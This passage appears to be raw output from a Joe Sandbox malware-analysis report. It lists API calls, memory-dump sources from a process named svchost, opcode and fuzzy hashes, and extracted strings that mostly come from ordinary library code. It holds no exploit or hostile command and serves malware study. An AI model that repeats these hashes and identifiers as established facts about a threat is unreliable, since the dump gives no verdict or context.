                          Similarity
                          • API ID: _errno$ErrorLast$getsockname
                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                          • API String ID: 837846698-2605427207
                          • Opcode ID: 5c634eb2012870781e77425daf34be7e0c5be7cdabfc357b16345476ad618bd3
                          • Instruction ID: 96ebea0360ecff7b1f80defa99b085c1545afcfa8152981b6359c27da0f6b221
                          • Opcode Fuzzy Hash: 5c634eb2012870781e77425daf34be7e0c5be7cdabfc357b16345476ad618bd3
                          • Instruction Fuzzy Hash: CB315F27B1D7CAD2EA21CF11E4603EA6360FB9AB84F405236EA8C47756DF6CD1858744
                          APIs
                          • CreateSemaphoreA.KERNEL32 ref: 64941B20
                          • CreateSemaphoreA.KERNEL32 ref: 64941B36
                          • InitializeCriticalSection.KERNEL32 ref: 64941B5B
                          • InitializeCriticalSection.KERNEL32 ref: 64941B61
                          • InitializeCriticalSection.KERNEL32 ref: 64941B67
                          • CloseHandle.KERNEL32 ref: 64941B90
                          • CloseHandle.KERNEL32 ref: 64941BA5
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection$CloseCreateHandleSemaphore
                          • String ID:
                          • API String ID: 3487344249-0
                          • Opcode ID: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                          • Instruction ID: 31c3c2f24a53828e468885d33ffcfcee3f6f88692367c2784a926345d8c92843
                          • Opcode Fuzzy Hash: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                          • Instruction Fuzzy Hash: 40219D327016418AFB099F32F9503AA37E5EB45B98F088139CE2D4B398EF38C495C750
                          APIs
                            • Part of subcall function 00007FFDA55BF210: QueryPerformanceCounter.KERNEL32(?,?,00000000,00007FFDA55AC534), ref: 00007FFDA55BF227
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CA5
                            • Part of subcall function 00007FFDA5580C70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CB8
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CDF
                            • Part of subcall function 00007FFDA5580C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CEC
                          • MoveFileExW.KERNEL32 ref: 00007FFDA55AC559
                          • Sleep.KERNEL32 ref: 00007FFDA55AC5A4
                          • MoveFileExW.KERNEL32 ref: 00007FFDA55AC5B6
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC5C8
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC5D6
                            • Part of subcall function 00007FFDA55BF210: GetTickCount.KERNEL32 ref: 00007FFDA55BF25D
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC5FB
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC609
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$ByteCharFileMoveMultiWide$CountCounterPerformanceQuerySleepTickmalloc
                          • String ID:
                          • API String ID: 1097834511-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: ?
                          • API String ID: 1294909896-1684325040
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentHandleOpen_errno
                          • String ID:
                          • API String ID: 2250453136-0
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID:
                          • API String ID: 2086374402-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Value$CloseCurrentHandleSleepThread__iob_func_endthreadex
                          • String ID:
                          • API String ID: 2572950730-0
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 64942C62
                          • WaitForSingleObject.KERNEL32(?,?,?,?,64941698), ref: 64942CAD
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentObjectSingleThreadWait
                          • String ID:
                          • API String ID: 1728940165-0
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB812
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB835
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB867
                          • CertCloseStore.CRYPT32 ref: 00007FFDA55CB880
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB889
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00007FFDA55CDBDC), ref: 00007FFDA55CB893
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$CertCloseStore_strdupcallocmalloc
                          • String ID:
                          • API String ID: 1848418515-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: attempt to borrow xfer_buf when already borrowed$could not allocate xfer_buf of %zu bytes$transfer buffer size is 0$transfer has no multi handle
                          • API String ID: 0-2388664328
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: attempt to borrow xfer_ulbuf when already borrowed$could not allocate xfer_ulbuf of %zu bytes$transfer has no multi handle$transfer upload buffer size is 0
                          • API String ID: 0-290960075
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CloseHandleValue$_endthreadex
                          • String ID:
                          • API String ID: 3955988603-0
                          APIs
                          • VirtualQuery.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BB0
                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BD2
                          Strings
                          • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC, 64947CD6
                          • Unknown pseudo relocation protocol version %d., xrefs: 64947CED
                          • Unknown pseudo relocation bit size %d., xrefs: 64947C8C
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Virtual$ProtectQuery
                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                          • API String ID: 1027372294-974437099
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          APIs
                          Strings
                          • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 649433B6
                          • (, xrefs: 649433AE
                          • (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 649433C1
                          • Assertion failed: (%s), file %s, line %d, xrefs: 649433C8
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: __iob_func
                          • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                          • API String ID: 686374508-3651547468
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: memmovestrchr$callocfree
                          • String ID:
                          • API String ID: 715457610-0
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559681C
                          • memmove.VCRUNTIME140(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559683A
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559689B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55968A5
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55968AF
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55968CA
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$callocmemmove
                          • String ID:
                          • API String ID: 2309541529-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: OS/400$SITE NAMEFMT 1
                          • API String ID: 1294909896-2049154998
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: _errno$CreateSemaphore
                          • String ID:
                          • API String ID: 4016566793-0
                          • Opcode ID: 589d0227ed7358cdbab2bd92d4174e6ec32cd5d37d7a8e4e3cf95ff430ec2371
                          • Instruction ID: b79095f19616a0e1c0eed2ee7e78f77239b15f2aeb5a75ddd7e641c4488f5580
                          • Opcode Fuzzy Hash: 589d0227ed7358cdbab2bd92d4174e6ec32cd5d37d7a8e4e3cf95ff430ec2371
                          • Instruction Fuzzy Hash: 9011B1B2BC56008AF7195F39D9003492AA6AB9ABB4F189324CE29433C4DF3CCC51CB60
                          APIs
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B3829
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B383C
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B3850
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B38C7
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA559F6ED,?,?,?,00007FFDA55862D9), ref: 00007FFDA55B38D3
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdupmalloc
                          • String ID:
                          • API String ID: 111713529-0
                          • Opcode ID: d1ba6d1d21f2e3dad0caf2e82429f9c168c85e3aab7faece0acb10ed47e5996e
                          • Instruction ID: 7c42cd3166b286a31b5f79efe16cc1dc1c7beae132fd132e09c8cb5482ccc0d7
                          • Opcode Fuzzy Hash: d1ba6d1d21f2e3dad0caf2e82429f9c168c85e3aab7faece0acb10ed47e5996e
                          • Instruction Fuzzy Hash: EE213D29F0BB4A81EE569F06E528338A6A4EF49FC0B0A4435EE4D17B55EF3DE4518314
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 649475B5
                          • GetCurrentProcessId.KERNEL32 ref: 649475C0
                          • GetCurrentThreadId.KERNEL32 ref: 649475C8
                          • GetTickCount.KERNEL32 ref: 649475D0
                          • QueryPerformanceCounter.KERNEL32 ref: 649475DD
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: ea8bfe2061e22a54fb9383ec99bc53ec21c7b77bb38b29a6e5ad63f23be09ef5
                          • Instruction ID: 0c0c2922cb4178c1b0210dc40f9cacb2f98c604e546ea9db0ef1c374853c2b83
                          • Opcode Fuzzy Hash: ea8bfe2061e22a54fb9383ec99bc53ec21c7b77bb38b29a6e5ad63f23be09ef5
                          • Instruction Fuzzy Hash: 6D11A322791B5486F711AB29FD0835663A2B789BE4F181274DE6D47BA4EB3CC896C310
                          APIs
                          • CloseHandle.KERNEL32 ref: 649465CE
                          • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 64946602
                          • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 649465F7
                            • Part of subcall function 64943070: CloseHandle.KERNEL32 ref: 6494308F
                          • _errno.MSVCRT ref: 6494662C
                          • _errno.MSVCRT ref: 6494663F
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CloseHandleSleep_errno
                          • String ID:
                          • API String ID: 3806203616-0
                          • Opcode ID: 6a839e314fafbd7497d028076ab11196cdc404032560b441b8063b65648a7ce0
                          • Instruction ID: 03ddaebe43857b623ab1e550e4093299913edf0f9749a6867346f71a96c3e09c
                          • Opcode Fuzzy Hash: 6a839e314fafbd7497d028076ab11196cdc404032560b441b8063b65648a7ce0
                          • Instruction Fuzzy Hash: 1C018CB53C060482FB99AF36ED1036D2765AB56BE8F5812358E2A83790DF3DC891C710
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 64941A36
                          • LeaveCriticalSection.KERNEL32 ref: 64941A53
                          • LeaveCriticalSection.KERNEL32 ref: 64941A7A
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: 57d73889eeb91523de87f080284301cfa8d29add8d7bd3e5f7b6e4a3d255b1d7
                          • Instruction ID: 2dd914d0eaea0fc0e1107ad45c6fa9da700d638ea0117e3c271b5cb5a1496ee8
                          • Opcode Fuzzy Hash: 57d73889eeb91523de87f080284301cfa8d29add8d7bd3e5f7b6e4a3d255b1d7
                          • Instruction Fuzzy Hash: 8E01F72279520983EB194F67FD55319B6959B97BE6F18C2308E0E46390ED3CC4A68300
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 72c37c0da18354029ccf449bb2fbeb96b4f3bf4197331d8e1f86f4f6a8450b39
                          • Instruction ID: 8606c48f1902bdce3e6da9a820231a5313994c80e3d26e6c2e9ce07148e70555
                          • Opcode Fuzzy Hash: 72c37c0da18354029ccf449bb2fbeb96b4f3bf4197331d8e1f86f4f6a8450b39
                          • Instruction Fuzzy Hash: 3F11077AA0AB4582D7229F22E854229B3B4FB89F94F180531EE8D03B69CF7CD4958714
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentErrorHandleLastOpen_errno
                          • String ID:
                          • API String ID: 202612177-0
                          • Opcode ID: 587258b105657c6678b600fc4fc5aeb211ef1c91ff3197a6972a381e73b22a44
                          • Instruction ID: d49a8a23e1058b1192e3c43f6f29e1dfd3ea68b05546fdb3f02e8313691cc950
                          • Opcode Fuzzy Hash: 587258b105657c6678b600fc4fc5aeb211ef1c91ff3197a6972a381e73b22a44
                          • Instruction Fuzzy Hash: B1F0A76038550187EF0D5F72D8483AF61E79B0EB55F145539CD1A86390EF3DC975C620
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: memchr$ErrorLast
                          • String ID: response reading failed (errno: %d)
                          • API String ID: 1529586282-1140215186
                          • Opcode ID: 9c86d5756c3c46e04771a8445c278a0c19422653bd5d77946d67baac05f14e25
                          • Instruction ID: 17d9e47f3c713fdc8d1648bf842d32ead7b6099efa9633185d078f4bca3ef420
                          • Opcode Fuzzy Hash: 9c86d5756c3c46e04771a8445c278a0c19422653bd5d77946d67baac05f14e25
                          • Instruction Fuzzy Hash: 0651646670A78A86EA529F61A4643AA63A4FF46F84F844435DF8D47783DF3CE505C304
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: SimpleString::operator=
                          • String ID: %s: %s$Expire Date$FALSE
                          • API String ID: 356670603-71436683
                          • Opcode ID: e027ffc4118d0b9bb66c5e752e5dddc9c15727a926725d0609c68769251add0f
                          • Instruction ID: 079f773202453a9140856bb273abc1ef6654877665cc49479c7ec161555b68d4
                          • Opcode Fuzzy Hash: e027ffc4118d0b9bb66c5e752e5dddc9c15727a926725d0609c68769251add0f
                          • Instruction Fuzzy Hash: 2631802BB0A6CAD4FA22DF60A4603ED2360AB56B98F900031DE0D57797DE38E5459304
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: Last-Modified:$Location:
                          • API String ID: 2653869212-3815226001
                          • Opcode ID: 599a1c7a1d5416f27c979ff16cb942ea950d10dc1930039c8dc97ed055a1bf7a
